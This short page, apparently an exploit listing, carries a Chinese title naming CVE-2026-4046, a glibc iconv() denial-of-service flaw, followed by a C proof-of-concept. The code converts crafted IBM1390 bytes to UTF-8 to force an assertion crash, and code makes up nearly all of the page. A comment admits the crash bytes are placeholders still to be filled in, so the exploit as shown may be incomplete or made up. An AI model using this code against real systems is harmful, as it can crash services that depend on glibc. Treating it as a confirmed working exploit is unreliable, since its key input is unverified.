CVE-2026-4046 GNU C Library iconv()远程拒绝服务漏洞

#include <iconv.h> #include <stdio.h> #include <stdlib.h> int main() { // Open conversion descriptor from IBM1390 to UTF-8 iconv_t cd = iconv_open("UTF-8", "IBM1390"); if (cd == (iconv_t)-1) { perror("iconv_open"); return 1; } // Malicious input designed to trigger assertion failure // Specific bytes required based on glibc source code analysis char input[] = { /* Insert specific crash bytes here */ 0x0E, 0x00, 0x00, 0x00 }; char *inbuf = input; size_t inbytesleft = sizeof(input); char output[256]; char *outbuf = output; size_t outbytesleft = sizeof(output); // This call triggers the vulnerability and crashes the application size_t result = iconv(cd, &inbuf, &inbytesleft, &outbuf, &outbytesleft); if (result == (size_t)-1) { perror("iconv"); } iconv_close(cd); return 0; }